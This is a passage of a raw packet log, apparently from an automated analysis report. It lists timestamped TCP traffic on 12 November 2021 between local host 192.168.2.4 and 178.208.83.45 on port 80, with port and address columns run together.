                          Nov 12, 2021 22:23:40.417607069 CET4988480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.439692020 CET8049884178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.439728975 CET8049884178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.439754009 CET8049884178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.439827919 CET4988480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.439872026 CET4988480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.440093040 CET8049884178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.440203905 CET8049884178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.440229893 CET8049884178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.440254927 CET8049884178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.440326929 CET8049884178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.440356016 CET8049884178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.440382957 CET8049884178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.440407991 CET8049884178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.440519094 CET8049884178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.440593004 CET8049884178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.440896034 CET8049884178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.441186905 CET8049884178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.441292048 CET8049884178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.462230921 CET8049884178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.462264061 CET8049884178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.462431908 CET8049884178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.462634087 CET8049884178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.462754011 CET8049884178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.465370893 CET8049884178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.465462923 CET4988480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.485399008 CET4988480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.486812115 CET4988580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.507947922 CET8049884178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.508038998 CET4988480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.509274960 CET8049885178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.509421110 CET4988580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.510149002 CET4988580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.532407045 CET8049885178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.536098957 CET8049885178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.536161900 CET4988580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.641271114 CET4988580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.642430067 CET4988680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.665894032 CET8049885178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.665990114 CET4988580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.666040897 CET8049886178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.666151047 CET4988680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.666706085 CET4988680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.689129114 CET8049886178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.693264961 CET8049886178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.693849087 CET4988680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.800271988 CET4988680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.801405907 CET4988780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.822709084 CET8049886178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.822918892 CET4988680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.824187994 CET8049887178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.824394941 CET4988780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.825269938 CET4988780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.848083973 CET8049887178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.848125935 CET8049887178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.848155022 CET8049887178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.848332882 CET4988780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.856478930 CET4988780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.856553078 CET4988780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.856748104 CET4988780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.856894970 CET4988780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.879406929 CET8049887178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.879489899 CET8049887178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.879518032 CET8049887178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.879544020 CET8049887178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.879579067 CET8049887178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.879601002 CET4988780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.879607916 CET8049887178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.879652977 CET4988780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.879671097 CET4988780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.879698038 CET4988780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.902518988 CET8049887178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.902559042 CET8049887178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.902581930 CET8049887178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.902600050 CET8049887178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.902615070 CET8049887178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.902683020 CET4988780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.902698040 CET8049887178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.902755022 CET8049887178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.902761936 CET4988780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.902805090 CET4988780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.902822018 CET4988780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.902831078 CET8049887178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.902900934 CET4988780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.902997017 CET8049887178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.903069973 CET4988780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.903544903 CET4988780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.925328970 CET8049887178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.925360918 CET8049887178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.925376892 CET8049887178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.925393105 CET8049887178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.925440073 CET8049887178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.925467014 CET8049887178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.925520897 CET8049887178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.925519943 CET4988780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.925548077 CET8049887178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.925551891 CET4988780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.925560951 CET4988780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.925566912 CET4988780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.925571918 CET4988780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.925576925 CET4988780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.925614119 CET4988780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.925623894 CET8049887178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.925623894 CET4988780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.925715923 CET8049887178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.925733089 CET8049887178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.925734997 CET4988780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.925743103 CET8049887178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.925774097 CET8049887178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.925787926 CET4988780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.925810099 CET4988780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.925818920 CET4988780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.925851107 CET4988780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.925879002 CET8049887178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.925913095 CET8049887178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.925946951 CET4988780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.925987959 CET4988780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.926012993 CET8049887178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.926084995 CET4988780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.970453978 CET4988880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.993113041 CET8049888178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.993357897 CET4988880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.994213104 CET4988880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.016664028 CET8049888178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.020926952 CET8049888178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.021136999 CET4988880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.125931025 CET4988880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.127140999 CET4988980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.149571896 CET8049888178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.149610996 CET8049889178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.149692059 CET4988880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.149745941 CET4988980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.150444984 CET4988980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.172918081 CET8049889178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.175699949 CET8049889178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.175843000 CET4988980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.281963110 CET4988980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.295933008 CET4989080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.304382086 CET8049889178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.304866076 CET4988980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.318532944 CET8049890178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.320409060 CET4989080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.321176052 CET4989080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.343733072 CET8049890178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.346884012 CET8049890178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.347937107 CET4989080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.382517099 CET4989080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.384130955 CET4989180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.405333996 CET8049890178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.405493021 CET4989080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.406534910 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.406702042 CET4989180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.408776045 CET4989180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.408941031 CET4989180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.409163952 CET4989180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.409296036 CET4989180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.431173086 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.431205034 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.431461096 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.431476116 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.431483984 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.431523085 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.431538105 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.431569099 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.431583881 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.431591988 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.431600094 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.431610107 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.431612015 CET4989180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.431667089 CET4989180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.431687117 CET4989180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.431709051 CET4989180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.454025984 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.454051018 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.454063892 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.454072952 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.454087019 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.454094887 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.454108953 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.454117060 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.454143047 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.454155922 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.454175949 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.454190016 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.454196930 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.454235077 CET4989180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.454253912 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.454268932 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.454279900 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.454293013 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.454305887 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.454320908 CET4989180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.454380989 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.454423904 CET4989180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.454463005 CET4989180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.456072092 CET4989280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.478046894 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.478074074 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.478085995 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.478096962 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.478104115 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.478111982 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.478123903 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.478132010 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.478140116 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.478147030 CET4989180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.478151083 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.478159904 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.478167057 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.478174925 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.478185892 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.478193998 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.478199005 CET4989180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.478200912 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.478214979 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.478224039 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.478235006 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.478240013 CET4989180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.478244066 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.478257895 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.478269100 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.478277922 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.478287935 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.478296041 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.478311062 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.478317976 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.478324890 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.478336096 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.478342056 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.478348970 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.478359938 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.478367090 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.478374958 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.478384972 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.478391886 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.478399992 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.478410959 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.479151011 CET8049892178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.479298115 CET4989280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.479825020 CET4989280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.500705957 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.500813007 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.500828028 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.500843048 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.500869989 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.500884056 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.500896931 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.500911951 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.500929117 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.500943899 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.500960112 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.500973940 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.500987053 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.502038956 CET8049892178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.503694057 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.503798962 CET4989180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.510098934 CET8049892178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.510232925 CET4989280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.627085924 CET4989280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.627829075 CET4989180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.630283117 CET4989380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.649549007 CET8049892178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.649662018 CET4989280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.650109053 CET8049891178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.650583029 CET4989180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.652580976 CET8049893178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.654097080 CET4989380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.654845953 CET4989380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.677251101 CET8049893178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.679896116 CET8049893178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.680066109 CET4989380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.797920942 CET4989380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.800740004 CET4989480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.820311069 CET8049893178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.820431948 CET4989380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.824383020 CET8049894178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.824539900 CET4989480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.825675011 CET4989480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.847979069 CET8049894178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.851300001 CET8049894178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.851505995 CET4989480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.907788992 CET4989480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.907869101 CET4989480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.908065081 CET4989480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.908160925 CET4989480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.931685925 CET8049894178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.931823969 CET8049894178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.932033062 CET4989480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.932265043 CET8049894178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.932398081 CET4989480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.932454109 CET8049894178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.932482004 CET8049894178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.932493925 CET8049894178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.932651997 CET4989480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.932670116 CET4989480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.955806017 CET4989580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.957158089 CET8049894178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.957190990 CET8049894178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.957202911 CET8049894178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.957212925 CET8049894178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.957227945 CET8049894178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.957241058 CET8049894178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.957256079 CET8049894178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.957269907 CET8049894178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.957285881 CET8049894178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.957298040 CET8049894178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.957333088 CET4989480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.957389116 CET4989480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.957421064 CET4989480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.957459927 CET4989480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.978395939 CET8049895178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.978535891 CET4989580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.979407072 CET4989580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.979711056 CET8049894178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.979851961 CET4989480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.979867935 CET8049894178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.979887009 CET8049894178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.979902983 CET8049894178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.979918957 CET8049894178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.979954958 CET4989480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.980006933 CET4989480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:41.980017900 CET8049894178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.980034113 CET8049894178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.980048895 CET8049894178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.980201006 CET8049894178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.980216980 CET8049894178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.980232000 CET8049894178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.980401039 CET8049894178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.980417967 CET8049894178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.980573893 CET8049894178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.980592966 CET8049894178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.980607986 CET8049894178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.980626106 CET8049894178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.980640888 CET8049894178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:41.980655909 CET8049894178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:42.001827002 CET8049895178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:42.002141953 CET8049894178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:42.002199888 CET8049894178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:42.002321005 CET8049894178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:42.002332926 CET8049894178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:42.002439976 CET8049894178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:42.004497051 CET8049895178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:42.004630089 CET4989580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:42.005182981 CET8049894178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:42.005635023 CET4989480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:42.110233068 CET4989480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:42.110505104 CET4989580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:42.111615896 CET4989680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:42.132685900 CET8049894178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:42.132775068 CET4989480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:42.132832050 CET8049895178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:42.132920980 CET4989580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:42.133896112 CET8049896178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:42.134022951 CET4989680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:42.134850979 CET4989680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:42.157206059 CET8049896178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:42.161371946 CET8049896178.208.83.45192.168.2.4
